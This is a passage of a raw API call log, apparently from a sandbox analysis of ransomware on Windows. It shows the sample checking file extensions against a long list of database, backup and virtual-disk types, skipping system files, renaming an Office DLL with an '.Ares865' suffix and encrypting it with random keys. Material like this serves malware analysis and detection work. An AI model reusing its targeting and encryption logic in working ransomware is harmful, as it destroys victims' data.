(lpString1="dll", lpString2="his") returned -1 [0086.267] lstrlenW (lpString="ib") returned 2 [0086.267] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0086.267] lstrlenW (lpString="idb") returned 3 [0086.267] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0086.267] lstrlenW (lpString="ihx") returned 3 [0086.267] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0086.267] lstrlenW (lpString="itdb") returned 4 [0086.267] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0086.267] lstrlenW (lpString="itw") returned 3 [0086.267] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0086.267] lstrlenW (lpString="jet") returned 3 [0086.267] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0086.267] lstrlenW (lpString="jtx") returned 3 [0086.267] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0086.267] lstrlenW (lpString="kdb") returned 3 [0086.267] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0086.267] lstrlenW (lpString="kexi") returned 4 [0086.267] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0086.267] lstrlenW (lpString="kexic") returned 5 [0086.267] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0086.267] lstrlenW (lpString="kexis") returned 5 [0086.267] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0086.267] lstrlenW (lpString="lgc") returned 3 [0086.267] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0086.267] lstrlenW (lpString="lwx") returned 3 [0086.267] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0086.267] lstrlenW (lpString="maf") returned 3 [0086.267] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0086.267] lstrlenW (lpString="maq") returned 3 [0086.267] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0086.267] lstrlenW (lpString="mar") returned 3 [0086.267] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0086.267] lstrlenW (lpString="marshal") returned 7 [0086.267] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0086.267] lstrlenW (lpString="mas") returned 3 [0086.267] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0086.267] lstrlenW (lpString="mav") returned 3 [0086.267] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0086.268] lstrlenW (lpString="maw") returned 3 [0086.268] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0086.268] lstrlenW (lpString="mdbhtml") returned 7 [0086.268] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0086.268] lstrlenW (lpString="mdn") returned 3 [0086.268] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0086.268] lstrlenW (lpString="mdt") returned 3 [0086.268] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0086.268] lstrlenW (lpString="mfd") returned 3 [0086.268] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0086.268] lstrlenW (lpString="mpd") returned 3 [0086.268] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0086.268] lstrlenW (lpString="mrg") returned 3 [0086.268] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0086.268] lstrlenW (lpString="mud") returned 3 [0086.268] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0086.268] lstrlenW (lpString="mwb") returned 3 [0086.268] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0086.268] lstrlenW (lpString="myd") returned 3 [0086.268] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0086.268] lstrlenW (lpString="ndf") returned 3 [0086.268] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0086.268] lstrlenW (lpString="nnt") returned 3 [0086.268] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0086.268] lstrlenW (lpString="nrmlib") returned 6 [0086.268] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0086.268] lstrlenW (lpString="ns2") returned 3 [0086.268] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0086.268] lstrlenW (lpString="ns3") returned 3 [0086.268] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0086.268] lstrlenW (lpString="ns4") returned 3 [0086.268] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0086.268] lstrlenW (lpString="nsf") returned 3 [0086.268] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0086.268] lstrlenW (lpString="nv") returned 2 [0086.268] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0086.268] lstrlenW (lpString="nv2") returned 3 [0086.268] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0086.269] lstrlenW (lpString="nwdb") returned 4 [0086.269] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0086.269] lstrlenW (lpString="nyf") returned 3 [0086.269] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0086.269] lstrlenW (lpString="odb") returned 3 [0086.269] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.269] lstrlenW (lpString="odb") returned 3 [0086.269] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.269] lstrlenW (lpString="oqy") returned 3 [0086.269] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0086.269] lstrlenW (lpString="ora") returned 3 [0086.269] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0086.269] lstrlenW (lpString="orx") returned 3 [0086.269] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0086.269] lstrlenW (lpString="owc") returned 3 [0086.269] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0086.269] lstrlenW (lpString="p96") returned 3 [0086.269] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0086.269] lstrlenW (lpString="p97") returned 3 [0086.269] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0086.269] lstrlenW (lpString="pan") returned 3 [0086.269] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0086.269] lstrlenW (lpString="pdb") returned 3 [0086.269] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0086.269] lstrlenW (lpString="pdm") returned 3 [0086.269] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0086.269] lstrlenW (lpString="pnz") returned 3 [0086.269] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0086.269] lstrlenW (lpString="qry") returned 3 [0086.269] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0086.269] lstrlenW (lpString="qvd") returned 3 [0086.269] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0086.269] lstrlenW (lpString="rbf") returned 3 [0086.269] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0086.269] lstrlenW (lpString="rctd") returned 4 [0086.269] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0086.269] lstrlenW (lpString="rod") returned 3 [0086.270] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0086.270] lstrlenW (lpString="rodx") returned 4 [0086.270] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0086.270] lstrlenW (lpString="rpd") returned 3 [0086.270] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0086.270] lstrlenW (lpString="rsd") returned 3 [0086.270] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0086.270] lstrlenW (lpString="sas7bdat") returned 8 [0086.270] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0086.270] lstrlenW (lpString="sbf") returned 3 [0086.270] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0086.270] lstrlenW (lpString="scx") returned 3 [0086.270] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0086.270] lstrlenW (lpString="sdb") returned 3 [0086.270] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0086.270] lstrlenW (lpString="sdc") returned 3 [0086.270] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0086.270] lstrlenW (lpString="sdf") returned 3 [0086.270] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0086.270] lstrlenW (lpString="sis") returned 3 [0086.270] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0086.270] lstrlenW (lpString="spq") returned 3 [0086.270] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0086.270] lstrlenW (lpString="te") returned 2 [0086.270] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0086.270] lstrlenW (lpString="teacher") returned 7 [0086.270] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0086.270] lstrlenW (lpString="tmd") returned 3 [0086.270] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0086.270] lstrlenW (lpString="tps") returned 3 [0086.270] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0086.270] lstrlenW (lpString="trc") returned 3 [0086.270] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.270] lstrlenW (lpString="trc") returned 3 [0086.270] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.270] lstrlenW (lpString="trm") returned 3 [0086.270] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0086.270] lstrlenW (lpString="udb") returned 3 [0086.271] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0086.271] lstrlenW (lpString="udl") returned 3 [0086.271] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0086.271] lstrlenW (lpString="usr") returned 3 [0086.271] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0086.271] lstrlenW (lpString="v12") returned 3 [0086.271] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0086.271] lstrlenW (lpString="vis") returned 3 [0086.271] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0086.271] lstrlenW (lpString="vpd") returned 3 [0086.271] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0086.271] lstrlenW (lpString="vvv") returned 3 [0086.271] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0086.271] lstrlenW (lpString="wdb") returned 3 [0086.271] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0086.271] lstrlenW (lpString="wmdb") returned 4 [0086.271] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0086.271] lstrlenW (lpString="wrk") returned 3 [0086.271] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0086.271] lstrlenW (lpString="xdb") returned 3 [0086.271] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0086.271] lstrlenW (lpString="xld") returned 3 [0086.271] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0086.271] lstrlenW (lpString="xmlff") returned 5 [0086.271] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0086.271] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll.Ares865") returned 78 [0086.271] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0086.272] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0086.272] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=31584) returned 1 [0086.272] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0086.273] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0086.273] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0086.273] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0086.273] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0086.273] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.274] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e60, lpName=0x0) returned 0x15c [0086.275] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e60) returned 0x190000 [0086.277] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0086.278] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0086.278] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.278] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0086.278] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0086.278] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0086.278] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0086.278] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0086.278] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0086.278] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0086.279] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0086.279] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0086.279] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0086.279] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0086.279] CloseHandle (hObject=0x15c) returned 1 [0086.279] CloseHandle (hObject=0x118) returned 1 [0086.279] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0086.279] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0086.279] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0086.279] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x62875600, ftCreationTime.dwHighDateTime=0x1cacf6a, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x62875600, ftLastWriteTime.dwHighDateTime=0x1cacf6a, nFileSizeHigh=0x0, nFileSizeLow=0x3d960, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ONINTL.REST.trx_dll", cAlternateFileName="ONINTL~2.TRX")) returned 1 [0086.280] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0086.280] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="aoldtz.exe") returned 1 [0086.280] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2=".") returned 1 [0086.280] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="..") returned 1 [0086.280] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="windows") returned -1 [0086.280] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="bootmgr") returned 1 [0086.280] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="temp") returned -1 [0086.280] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="pagefile.sys") returned -1 [0086.280] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="boot") returned 1 [0086.280] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="ids.txt") returned 1 [0086.280] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0086.280] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="perflogs") returned -1 [0086.280] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="MSBuild") returned 1 [0086.280] lstrlenW (lpString="ONINTL.REST.trx_dll") returned 19 [0086.280] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll") returned 70 [0086.280] lstrcpyW (in: lpString1=0x2cce468, lpString2="ONINTL.REST.trx_dll" | out: lpString1="ONINTL.REST.trx_dll") returned="ONINTL.REST.trx_dll" [0086.280] lstrlenW (lpString="ONINTL.REST.trx_dll") returned 19 [0086.280] lstrlenW (lpString="Ares865") returned 7 [0086.280] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0086.280] lstrlenW (lpString=".dll") returned 4 [0086.280] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2=".dll") returned 1 [0086.280] lstrlenW (lpString=".lnk") returned 4 [0086.280] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2=".lnk") returned 1 [0086.280] lstrlenW (lpString=".ini") returned 4 [0086.280] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2=".ini") returned 1 [0086.280] lstrlenW (lpString=".sys") returned 4 [0086.280] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2=".sys") returned 1 [0086.280] lstrlenW (lpString="ONINTL.REST.trx_dll") returned 19 [0086.280] lstrlenW (lpString="bak") returned 3 [0086.280] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0086.280] lstrlenW (lpString="ba_") returned 3 [0086.280] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0086.280] lstrlenW (lpString="dbb") returned 3 [0086.280] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0086.280] lstrlenW (lpString="vmdk") returned 4 [0086.280] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0086.280] lstrlenW (lpString="rar") returned 3 [0086.281] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0086.281] lstrlenW (lpString="zip") returned 3 [0086.281] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0086.281] lstrlenW (lpString="tgz") returned 3 [0086.281] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0086.281] lstrlenW (lpString="vbox") returned 4 [0086.281] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0086.281] lstrlenW (lpString="vdi") returned 3 [0086.281] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0086.281] lstrlenW (lpString="vhd") returned 3 [0086.281] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0086.281] lstrlenW (lpString="vhdx") returned 4 [0086.281] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0086.281] lstrlenW (lpString="avhd") returned 4 [0086.281] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0086.281] lstrlenW (lpString="db") returned 2 [0086.281] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0086.281] lstrlenW (lpString="db2") returned 3 [0086.281] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0086.281] lstrlenW (lpString="db3") returned 3 [0086.281] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0086.281] lstrlenW (lpString="dbf") returned 3 [0086.281] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0086.281] lstrlenW (lpString="mdf") returned 3 [0086.281] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0086.281] lstrlenW (lpString="mdb") returned 3 [0086.281] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0086.281] lstrlenW (lpString="sql") returned 3 [0086.281] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0086.281] lstrlenW (lpString="sqlite") returned 6 [0086.281] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0086.281] lstrlenW (lpString="sqlite3") returned 7 [0086.281] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0086.281] lstrlenW (lpString="sqlitedb") returned 8 [0086.281] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0086.281] lstrlenW (lpString="xml") returned 3 [0086.281] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0086.281] lstrlenW (lpString="$er") returned 3 [0086.282] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0086.282] lstrlenW (lpString="4dd") returned 3 [0086.282] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0086.282] lstrlenW (lpString="4dl") returned 3 [0086.282] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0086.282] lstrlenW (lpString="^^^") returned 3 [0086.282] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0086.282] lstrlenW (lpString="abs") returned 3 [0086.282] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0086.282] lstrlenW (lpString="abx") returned 3 [0086.282] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0086.282] lstrlenW (lpString="accdb") returned 5 [0086.282] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0086.282] lstrlenW (lpString="accdc") returned 5 [0086.282] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0086.282] lstrlenW (lpString="accde") returned 5 [0086.282] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0086.282] lstrlenW (lpString="accdr") returned 5 [0086.282] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0086.282] lstrlenW (lpString="accdt") returned 5 [0086.282] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0086.282] lstrlenW (lpString="accdw") returned 5 [0086.282] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0086.282] lstrlenW (lpString="accft") returned 5 [0086.282] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0086.282] lstrlenW (lpString="adb") returned 3 [0086.282] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.282] lstrlenW (lpString="adb") returned 3 [0086.282] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.282] lstrlenW (lpString="ade") returned 3 [0086.282] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0086.282] lstrlenW (lpString="adf") returned 3 [0086.282] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0086.282] lstrlenW (lpString="adn") returned 3 [0086.282] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0086.282] lstrlenW (lpString="adp") returned 3 [0086.282] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0086.283] lstrlenW (lpString="alf") returned 3 [0086.283] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0086.283] lstrlenW (lpString="ask") returned 3 [0086.283] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0086.283] lstrlenW (lpString="btr") returned 3 [0086.283] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0086.283] lstrlenW (lpString="cat") returned 3 [0086.283] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0086.283] lstrlenW (lpString="cdb") returned 3 [0086.283] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0086.283] lstrlenW (lpString="ckp") returned 3 [0086.283] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0086.283] lstrlenW (lpString="cma") returned 3 [0086.283] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0086.283] lstrlenW (lpString="cpd") returned 3 [0086.283] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0086.283] lstrlenW (lpString="dacpac") returned 6 [0086.283] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0086.283] lstrlenW (lpString="dad") returned 3 [0086.283] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0086.283] lstrlenW (lpString="dadiagrams") returned 10 [0086.283] lstrcmpiW (lpString1="ST.trx_dll", lpString2="dadiagrams") returned 1 [0086.283] lstrlenW (lpString="daschema") returned 8 [0086.283] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0086.283] lstrlenW (lpString="db-journal") returned 10 [0086.283] lstrcmpiW (lpString1="ST.trx_dll", lpString2="db-journal") returned 1 [0086.283] lstrlenW (lpString="db-shm") returned 6 [0086.283] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0086.283] lstrlenW (lpString="db-wal") returned 6 [0086.283] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0086.283] lstrlenW (lpString="dbc") returned 3 [0086.283] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0086.283] lstrlenW (lpString="dbs") returned 3 [0086.283] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0086.283] lstrlenW (lpString="dbt") returned 3 [0086.283] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0086.283] lstrlenW (lpString="dbv") returned 3 [0086.283] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0086.284] lstrlenW (lpString="dbx") returned 3 [0086.284] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0086.284] lstrlenW (lpString="dcb") returned 3 [0086.284] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0086.284] lstrlenW (lpString="dct") returned 3 [0086.284] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0086.284] lstrlenW (lpString="dcx") returned 3 [0086.284] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0086.284] lstrlenW (lpString="ddl") returned 3 [0086.284] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0086.284] lstrlenW (lpString="dlis") returned 4 [0086.284] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0086.284] lstrlenW (lpString="dp1") returned 3 [0086.284] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0086.284] lstrlenW (lpString="dqy") returned 3 [0086.284] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0086.284] lstrlenW (lpString="dsk") returned 3 [0086.284] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0086.284] lstrlenW (lpString="dsn") returned 3 [0086.284] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0086.284] lstrlenW (lpString="dtsx") returned 4 [0086.284] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0086.284] lstrlenW (lpString="dxl") returned 3 [0086.284] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0086.284] lstrlenW (lpString="eco") returned 3 [0086.284] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0086.284] lstrlenW (lpString="ecx") returned 3 [0086.284] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0086.284] lstrlenW (lpString="edb") returned 3 [0086.284] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0086.284] lstrlenW (lpString="epim") returned 4 [0086.284] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0086.284] lstrlenW (lpString="fcd") returned 3 [0086.284] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0086.284] lstrlenW (lpString="fdb") returned 3 [0086.284] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0086.284] lstrlenW (lpString="fic") returned 3 [0086.284] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0086.285] lstrlenW (lpString="flexolibrary") returned 12 [0086.285] lstrcmpiW (lpString1="REST.trx_dll", lpString2="flexolibrary") returned 1 [0086.285] lstrlenW (lpString="fm5") returned 3 [0086.285] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0086.285] lstrlenW (lpString="fmp") returned 3 [0086.285] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0086.285] lstrlenW (lpString="fmp12") returned 5 [0086.285] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0086.285] lstrlenW (lpString="fmpsl") returned 5 [0086.285] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0086.285] 